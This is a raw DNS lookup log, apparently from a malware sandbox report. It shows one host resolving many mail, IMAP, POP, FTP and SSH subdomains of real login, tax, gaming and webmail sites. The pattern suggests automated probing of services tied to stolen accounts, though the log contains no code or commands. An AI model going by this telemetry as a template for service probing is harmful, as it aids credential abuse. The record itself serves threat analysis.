                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:14:53.569701910 CET1.1.1.1192.168.2.60xe940No error (0)084725.parkingcrew.net13.248.148.254A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:14:53.570594072 CET1.1.1.1192.168.2.60x674bNo error (0)imap.tiktok.com18.214.153.47A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:14:53.570594072 CET1.1.1.1192.168.2.60x674bNo error (0)imap.tiktok.com52.87.107.230A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:14:53.572992086 CET1.1.1.1192.168.2.60xf057Name error (3)mailgate.casinocontroller.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:14:53.589746952 CET1.1.1.1192.168.2.60x84f6Name error (3)ftp.app.jobpet.com.brnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:14:53.605344057 CET1.1.1.1192.168.2.60x8817Name error (3)pop.midetuvelocidad.claro.com.penonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:14:53.615685940 CET1.1.1.1192.168.2.60xcc36Name error (3)pop.servicios.sat.gob.mxnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:14:53.615907907 CET1.1.1.1192.168.2.60x50f2Server failure (2)ftp.signup.takendelight.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:14:53.619406939 CET1.1.1.1192.168.2.60xe741Name error (3)ssh.auth.cambridgelms.orgnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:14:53.624131918 CET1.1.1.1192.168.2.60xbad3Name error (3)relay.ro.bongacams.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:14:53.624766111 CET1.1.1.1192.168.2.60xb204Name error (3)ssh.servicios.sat.gob.mxnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:14:53.643229008 CET1.1.1.1192.168.2.60x3f54Name error (3)ssh.app.jobpet.com.brnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:14:53.645433903 CET1.1.1.1192.168.2.60xf8d3Server failure (2)ssh.signup.takendelight.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:14:53.657644987 CET1.1.1.1192.168.2.60xe940No error (0)ww12.chainmine.io084725.parkingcrew.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:14:53.657644987 CET1.1.1.1192.168.2.60xe940No error (0)084725.parkingcrew.net76.223.26.96A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:14:53.657644987 CET1.1.1.1192.168.2.60xe940No error (0)084725.parkingcrew.net13.248.148.254A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:14:53.659832954 CET1.1.1.1192.168.2.60xfef4Name error (3)imap.netcsomagom.dpd.hunonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:14:53.695164919 CET1.1.1.1192.168.2.60x1054Name error (3)pop.ssl-es.hoteles.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:14:53.731348038 CET1.1.1.1192.168.2.60xb74eName error (3)mailgate.contribuyente.seniat.gob.venonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:14:53.731615067 CET1.1.1.1192.168.2.60x43a4Name error (3)imap.servicios.sat.gob.mxnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:14:53.746490955 CET1.1.1.1192.168.2.60x1e41Name error (3)mail.auth.cambridgelms.orgnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:14:53.778471947 CET1.1.1.1192.168.2.60x4f6cName error (3)pop.mobile.liga365gacor.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:14:53.783624887 CET1.1.1.1192.168.2.60x1de5Name error (3)pop3.netcsomagom.dpd.hunonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:14:53.785000086 CET1.1.1.1192.168.2.60xe5abName error (3)imap.mobile.liga365gacor.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:14:53.785429001 CET1.1.1.1192.168.2.60x6572Server failure (2)imap.signup.takendelight.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:14:53.785820007 CET1.1.1.1192.168.2.60xeeb8Name error (3)mailgate.netizion.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:14:53.802032948 CET1.1.1.1192.168.2.60xb84aName error (3)pop3.account.live.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:14:53.811518908 CET1.1.1.1192.168.2.60xc542Name error (3)mailgate.netcsomagom.dpd.hunonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:14:53.823633909 CET1.1.1.1192.168.2.60xfaeaName error (3)relay.us04web.zoom.usnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:14:53.839723110 CET1.1.1.1192.168.2.60x54b8Name error (3)relay.casinocontroller.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:14:53.840358973 CET1.1.1.1192.168.2.60xa91dName error (3)mail.etd.lib.tuke.sknonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:14:53.840372086 CET1.1.1.1192.168.2.60xa91dName error (3)mail.etd.lib.tuke.sknonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:14:53.850027084 CET1.1.1.1192.168.2.60xf2efNo error (0)www.yellosa.co.za172.66.41.20A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:14:53.850027084 CET1.1.1.1192.168.2.60xf2efNo error (0)www.yellosa.co.za172.66.42.236A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:14:53.850092888 CET1.1.1.1192.168.2.60xf2efNo error (0)www.yellosa.co.za172.66.41.20A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:14:53.850092888 CET1.1.1.1192.168.2.60xf2efNo error (0)www.yellosa.co.za172.66.42.236A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:14:53.892880917 CET1.1.1.1192.168.2.60xc41aName error (3)pop.sii.itzacatepec.edu.mxnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:14:53.892893076 CET1.1.1.1192.168.2.60xc41aName error (3)pop.sii.itzacatepec.edu.mxnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:14:53.893054962 CET1.1.1.1192.168.2.60x5f6cName error (3)ssh.sii.itzacatepec.edu.mxnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:16:06.574698925 CET1.1.1.1192.168.2.60xa539Name error (3)ftp.steamcommunity.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:16:06.581820965 CET1.1.1.1192.168.2.60xc914Name error (3)mailgate.netcsomagom.dpd.hunonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:16:06.582525015 CET1.1.1.1192.168.2.60xc441Name error (3)mail.tls21.netnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:16:06.583523035 CET1.1.1.1192.168.2.60x91eeName error (3)pop.tls21.netnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:16:06.589349031 CET1.1.1.1192.168.2.60x9c55Name error (3)mail.mobile.liga365gacor.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:16:06.589711905 CET1.1.1.1192.168.2.60xfa65Name error (3)ftp.tls21.netnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:16:06.594501972 CET1.1.1.1192.168.2.60x4002No error (0)ucv.blackboard.comlearn-prod-5ea8899e63bc1-2104512027.us-east-1.elb.amazonaws.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:16:06.594501972 CET1.1.1.1192.168.2.60x4002No error (0)learn-prod-5ea8899e63bc1-2104512027.us-east-1.elb.amazonaws.com44.195.133.145A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:16:06.594501972 CET1.1.1.1192.168.2.60x4002No error (0)learn-prod-5ea8899e63bc1-2104512027.us-east-1.elb.amazonaws.com54.205.118.36A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:16:06.594501972 CET1.1.1.1192.168.2.60x4002No error (0)learn-prod-5ea8899e63bc1-2104512027.us-east-1.elb.amazonaws.com44.194.231.6A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:16:06.594501972 CET1.1.1.1192.168.2.60x4002No error (0)learn-prod-5ea8899e63bc1-2104512027.us-east-1.elb.amazonaws.com54.158.51.60A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:16:06.594501972 CET1.1.1.1192.168.2.60x4002No error (0)learn-prod-5ea8899e63bc1-2104512027.us-east-1.elb.amazonaws.com52.6.30.70A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:16:06.598916054 CET1.1.1.1192.168.2.60xaecfNo error (0)milogin.michigan.govmilogin.michigan.gov.cdn.cloudflare.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:16:06.602750063 CET1.1.1.1192.168.2.60xbe47No error (0)store.steampowered.com23.46.200.106A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:16:06.615004063 CET1.1.1.1192.168.2.60x46d0No error (0)app.plex.tv104.18.41.153A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:16:06.615004063 CET1.1.1.1192.168.2.60x46d0No error (0)app.plex.tv172.64.146.103A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:16:06.619177103 CET1.1.1.1192.168.2.60x4dd5Name error (3)ftp.gitam.zoom.usnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:16:06.620156050 CET1.1.1.1192.168.2.60x677No error (0)us04web.zoom.us170.114.52.4A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:16:06.628770113 CET1.1.1.1192.168.2.60x2411Server failure (2)smtp.brasilliker.netnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:16:06.633411884 CET1.1.1.1192.168.2.60x8c5bNo error (0)gitam.zoom.uswww.zoom.usCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:16:06.633411884 CET1.1.1.1192.168.2.60x8c5bNo error (0)www.zoom.uszoom.usCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:16:06.633411884 CET1.1.1.1192.168.2.60x8c5bNo error (0)zoom.us170.114.52.2A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:16:06.634346008 CET1.1.1.1192.168.2.60xb86fName error (3)mail.signup2.br.leagueoflegends.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:16:06.636631966 CET1.1.1.1192.168.2.60xba3eName error (3)tls21.netnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:16:06.650799990 CET1.1.1.1192.168.2.60x12bcName error (3)ftp.milogin.michigan.govnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:16:06.654329062 CET1.1.1.1192.168.2.60x1a10No error (0)pxndx-mcr.boletia.com44.199.96.179A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:16:06.654329062 CET1.1.1.1192.168.2.60x1a10No error (0)pxndx-mcr.boletia.com52.21.29.94A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:16:06.654329062 CET1.1.1.1192.168.2.60x1a10No error (0)pxndx-mcr.boletia.com3.219.54.242A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:16:06.654329062 CET1.1.1.1192.168.2.60x1a10No error (0)pxndx-mcr.boletia.com54.85.194.183A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:16:06.662506104 CET1.1.1.1192.168.2.60x85b4Name error (3)mail.sport.autoplay.cloudnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:16:06.668960094 CET1.1.1.1192.168.2.60x1aeServer failure (2)mail.signup.takendelight.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:16:06.678833961 CET1.1.1.1192.168.2.60x6ec2No error (0)srienlinea.sri.gob.ec190.152.216.14A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:16:06.686903954 CET1.1.1.1192.168.2.60xbb34No error (0)hi-in.facebook.comstar.facebook.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:16:06.686903954 CET1.1.1.1192.168.2.60xbb34No error (0)star.facebook.comstar.c10r.facebook.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:16:06.686903954 CET1.1.1.1192.168.2.60xbb34No error (0)star.c10r.facebook.com31.13.65.1A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:16:06.687479019 CET1.1.1.1192.168.2.60x3a6bNo error (0)mxa-00569201.gslb.pphosted.com205.220.166.26A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:16:06.703900099 CET1.1.1.1192.168.2.60x2895Name error (3)mailgate.contribuyente.seniat.gob.venonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:16:06.709175110 CET1.1.1.1192.168.2.60x15ebName error (3)pop3.app.jobpet.com.brnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:16:06.711620092 CET1.1.1.1192.168.2.60xbe93Name error (3)mail.app.jobpet.com.brnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:16:06.731429100 CET1.1.1.1192.168.2.60xe226No error (0)oferta.senasofiaplus.edu.co186.113.7.204A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:16:06.735999107 CET1.1.1.1192.168.2.60x37aaServer failure (2)mailgate.signup.takendelight.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:16:06.742657900 CET1.1.1.1192.168.2.60x366Name error (3)app.jobpet.com.brnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:16:06.770867109 CET1.1.1.1192.168.2.60x2ce8Name error (3)relay.ro.bongacams.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:16:06.791754007 CET1.1.1.1192.168.2.60xccafNo error (0)account.live.comaccount.msa.msidentity.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:16:06.801028967 CET1.1.1.1192.168.2.60x6c92No error (0)cloud.simplify3d.com44.233.131.115A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:16:06.801028967 CET1.1.1.1192.168.2.60x6c92No error (0)cloud.simplify3d.com34.208.174.61A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:16:06.804208040 CET1.1.1.1192.168.2.60xaa8cNo error (0)pt.secure.imvu.comsecure.imvu.sl.smartling.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:16:06.804208040 CET1.1.1.1192.168.2.60xaa8cNo error (0)secure.imvu.sl.smartling.com54.183.63.241A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:16:06.804208040 CET1.1.1.1192.168.2.60xaa8cNo error (0)secure.imvu.sl.smartling.com52.52.207.210A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:16:06.832743883 CET1.1.1.1192.168.2.60x295dName error (3)etd.lib.tuke.sknonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:16:06.862020969 CET1.1.1.1192.168.2.60xa385No error (0)tiktok.com13.249.120.4A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:16:06.862020969 CET1.1.1.1192.168.2.60xa385No error (0)tiktok.com13.249.120.86A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:16:06.862020969 CET1.1.1.1192.168.2.60xa385No error (0)tiktok.com13.249.120.75A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:16:06.862020969 CET1.1.1.1192.168.2.60xa385No error (0)tiktok.com13.249.120.113A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:16:06.863554955 CET1.1.1.1192.168.2.60xcdc1No error (0)connect.appen.com3.163.115.11A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:16:06.863554955 CET1.1.1.1192.168.2.60xcdc1No error (0)connect.appen.com3.163.115.127A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:16:07.090133905 CET1.1.1.1192.168.2.60xa86eNo error (0)iam.gov.sa78.93.109.21A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:16:07.114613056 CET1.1.1.1192.168.2.60x1f05No error (0)ftp.multiideas.commultiideas.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:16:07.114613056 CET1.1.1.1192.168.2.60x1f05No error (0)multiideas.com192.185.5.23A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:16:07.117495060 CET1.1.1.1192.168.2.60x775aName error (3)relay.naukrigulf.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:16:07.121253967 CET1.1.1.1192.168.2.60xa5fcName error (3)smtp.analvids.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:16:07.129224062 CET1.1.1.1192.168.2.60x3e87Name error (3)relay.ssl-es.hoteles.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:16:07.129642010 CET1.1.1.1192.168.2.60x6556Name error (3)ftp.zuhauseplus.vodafone.denonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:16:07.129668951 CET1.1.1.1192.168.2.60x6556Name error (3)ftp.zuhauseplus.vodafone.denonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:16:07.130804062 CET1.1.1.1192.168.2.60xbaeaName error (3)mail.ssl-es.hoteles.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:16:07.151452065 CET1.1.1.1192.168.2.60x17fbServer failure (2)mailgate.brasilliker.netnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:16:07.165667057 CET1.1.1.1192.168.2.60xf17Name error (3)mailgate.mobile.liga365gacor.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:16:07.194169998 CET1.1.1.1192.168.2.60xf3acName error (3)mail.s163-es.ogame.gameforge.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:16:07.198788881 CET1.1.1.1192.168.2.60xdb84Name error (3)mobile.liga365gacor.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:16:07.202147961 CET1.1.1.1192.168.2.60xaf4dName error (3)ssh.netcsomagom.dpd.hunonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:16:07.207798004 CET1.1.1.1192.168.2.60x2930Name error (3)relay.netcsomagom.dpd.hunonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:16:07.212265015 CET1.1.1.1192.168.2.60xd876Name error (3)ssh.sii.itzacatepec.edu.mxnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:16:07.213814020 CET1.1.1.1192.168.2.60x6855Name error (3)mailgate.account.live.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:16:07.216547966 CET1.1.1.1192.168.2.60xd905Name error (3)mailgate.vidcorn.tvnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:16:07.235192060 CET1.1.1.1192.168.2.60x6f77Name error (3)relay.v.xsanime.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:16:07.237381935 CET1.1.1.1192.168.2.60x2ffdName error (3)mail.transaccional.saludtotal.com.cononenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:16:07.263897896 CET1.1.1.1192.168.2.60x2e83Name error (3)ssh.us04web.zoom.usnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:16:07.265919924 CET1.1.1.1192.168.2.60x87c4No error (0)th-th.facebook.comstar.facebook.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:16:07.265919924 CET1.1.1.1192.168.2.60x87c4No error (0)star.facebook.comstar.c10r.facebook.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:16:07.265919924 CET1.1.1.1192.168.2.60x87c4No error (0)star.c10r.facebook.com31.13.88.1A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:16:07.283821106 CET1.1.1.1192.168.2.60xfc29Name error (3)pop3.midetuvelocidad.claro.com.penonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:16:07.292637110 CET1.1.1.1192.168.2.60xfa8dName error (3)ftp.etd.lib.tuke.sknonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:16:07.293359041 CET1.1.1.1192.168.2.60x9bffNo error (0)ww7.chainmine.io76899.bodis.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:16:07.293359041 CET1.1.1.1192.168.2.60x9bffNo error (0)76899.bodis.com199.59.243.225A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:16:07.318280935 CET1.1.1.1192.168.2.60x9388No error (0)m.codere.com.co5s5tsl3.impervadns.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:16:07.318280935 CET1.1.1.1192.168.2.60x9388No error (0)5s5tsl3.impervadns.net45.60.0.44A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:16:07.318341017 CET1.1.1.1192.168.2.60x9388No error (0)m.codere.com.co5s5tsl3.impervadns.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:16:07.318341017 CET1.1.1.1192.168.2.60x9388No error (0)5s5tsl3.impervadns.net45.60.0.44A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:16:07.329551935 CET1.1.1.1192.168.2.60x87c4No error (0)th-th.facebook.comstar.facebook.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:16:07.329551935 CET1.1.1.1192.168.2.60x87c4No error (0)star.facebook.comstar.c10r.facebook.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:16:07.329551935 CET1.1.1.1192.168.2.60x87c4No error (0)star.c10r.facebook.com31.13.88.1A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:16:07.330359936 CET1.1.1.1192.168.2.60x9335No error (0)mx1.hostinger.com172.65.182.103A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:16:07.334265947 CET1.1.1.1192.168.2.60xb196Name error (3)smtp.sport.autoplay.cloudnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:16:07.340538025 CET1.1.1.1192.168.2.60x297cName error (3)mailgate.uh.isnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:16:07.350933075 CET1.1.1.1192.168.2.60xb53eName error (3)imap.app.jobpet.com.brnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:16:07.454356909 CET1.1.1.1192.168.2.60x297cName error (3)mailgate.uh.isnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:16:07.456559896 CET1.1.1.1192.168.2.60x200dName error (3)pop3.tls21.netnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:16:07.477936029 CET1.1.1.1192.168.2.60x496cName error (3)ssh.srienlinea.sri.gob.ecnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:16:07.482716084 CET1.1.1.1192.168.2.60xa0ddName error (3)imap.m.sellercenter.lazada.com.mynonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:16:07.487637997 CET1.1.1.1192.168.2.60xd08No error (0)www.minecraft.netwww.minecraft.net-v1.edgesuite.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:16:07.489227057 CET1.1.1.1192.168.2.60xe994Name error (3)smtp.s163-es.ogame.gameforge.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:16:07.503001928 CET1.1.1.1192.168.2.60xdcd4Name error (3)pop.mitextoescolar.mineduc.clnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:16:07.503071070 CET1.1.1.1192.168.2.60xdcd4Name error (3)pop.mitextoescolar.mineduc.clnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:16:07.507370949 CET1.1.1.1192.168.2.60x7462Name error (3)auth.cambridgelms.orgnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:16:07.516856909 CET1.1.1.1192.168.2.60x496cName error (3)ssh.srienlinea.sri.gob.ecnonenoneA (IP address)IN (0x0001)false
